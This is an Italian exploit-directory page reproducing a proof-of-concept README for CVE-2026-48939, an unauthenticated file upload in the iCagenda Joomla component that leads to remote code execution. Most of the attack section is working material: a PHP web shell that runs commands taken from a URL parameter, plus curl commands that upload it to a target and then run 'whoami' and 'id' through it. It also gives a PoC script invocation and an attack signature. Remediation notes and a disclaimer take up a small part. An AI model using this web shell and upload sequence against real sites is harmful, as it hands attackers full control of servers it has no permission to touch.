Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
By-Poloss..-..CVE-2026-48939 — Caricamento file non autenticato a RCE in iCagenda | Kitploit
Strumenti/GitHubGitHub/polosss/by-poloss..-..cve-2026-48939
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubpolosss/by-poloss..-..cve-2026-48939

By-Poloss..-..CVE-2026-48939

Caricamento file non autenticato a RCE in iCagenda

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1112 mesi faNon ancora revisionato
Condividi

CVE-2026-48939 - Upload di File Non Autenticato in iCagenda che Porta a RCE

Panoramica

CampoValore
ID CVECVE-2026-48939
Punteggio CVSS 4.010.0 Critico
Vettore CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-284: Controllo degli Accessi Improprio
Versioni InteressateiCagenda 3.2.1 - 3.9.14 e 4.0.0 - 4.0.7
Corretto iniCagenda 4.0.8 e 3.9.15
Pubblicato20 giugno 2026

Descrizione della Vulnerabilità

iCagenda, un popolare componente per eventi e calendario per Joomla, contiene una vulnerabilità di upload di file non autenticato che consente a remoto aggressori di caricare ed eseguire codice PHP arbitrario sui siti Joomla 6.

Dettagli Tecnici

La vulnerabilità esiste nella funzionalità di allegato file del modulo di invio eventi del frontend:

  1. Controllo degli Accessi Mancante: L'endpoint di invio (index.php?option=com_icagenda&task=registration.submit) non applica l'autenticazione, bypassando l'impostazione di accesso "Solo Registrati".

  2. Nessuna Validazione dei File: I file caricati vengono salvati con la loro estensione originale senza:

    • Controllo della lista consentita delle estensioni
    • Verifica del tipo MIME
    • Ispezione del contenuto del file
  3. Scrittura Diretta del File: I file vengono scritti in /images/icagenda/frontend/attachments/[filename] direttamente nella root web.

  4. Esecuzione PHP: Su Joomla 6, i file .php caricati sono eseguibili, portando a Esecuzione di Codice Remota (RCE).

Proof of Concept

Metodo 1: Uso di curl (Comando Singolo)

root@kitploit:~
# Crea il payload della shell PHP
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF

# Carica la shell
curl -k -s \
  -F "title=Test Event" \
  -F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
  "https://poloss-jomola.ddev.site/icagenda_submit.php"

# Esegui comandi tramite la shell caricata
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"

Metodo 2: Uso dello Script PoC

root@kitploit:~
# Vai alla directory del progetto

# Esegui lo script PoC
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site

Passaggi per lo Sfruttamento

  1. Identificare l'endpoint vulnerabile:

    root@kitploit:~
    https://target.com/index.php?option=com_icagenda&task=submit
    
  2. Caricare una web shell PHP:

    root@kitploit:~
    curl -X POST -F "jform[attachment][email protected]" \
      "https://target.com/index.php?option=com_icagenda&task=submit"
    
  3. Eseguire la shell:

    root@kitploit:~
    curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
    

Impatto

  • Riservatezza: Perdita completa di riservatezza - l'aggressore può leggere tutti i file
  • Integrità: Perdita completa di integrità - l'aggressore può modificare tutti i dati
  • Disponibilità: Perdita completa di disponibilità - l'aggressore può negare il servizio
  • Esecuzione di Codice Remota: Compromissione totale del server

Firma dell'Attacco

Basandosi sui log di sfruttamento reali, la firma dell'attacco è:

root@kitploit:~
# Passo 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"

# Passo 2: Esecuzione
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0

Rimedio

  1. Immediato: Aggiornare iCagenda alla versione 4.0.8 (o 3.9.15 per il ramo legacy)
  2. Alternativa: Rimuovere o rinominare temporaneamente le cartelle com_icagenda
  3. Nota: Annullare la pubblicazione del componente NON protegge da questa vulnerabilità

Riferimenti

  • iCagenda Zero Day RCE - mysites.guru
  • iCagenda Ufficiale
  • Changelog 4.0.8
  • Avviso ADP CISA

Dichiarazione di Esclusione di Responsabilità

Questo PoC è solo a scopo educativo e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.

Scarica lo strumento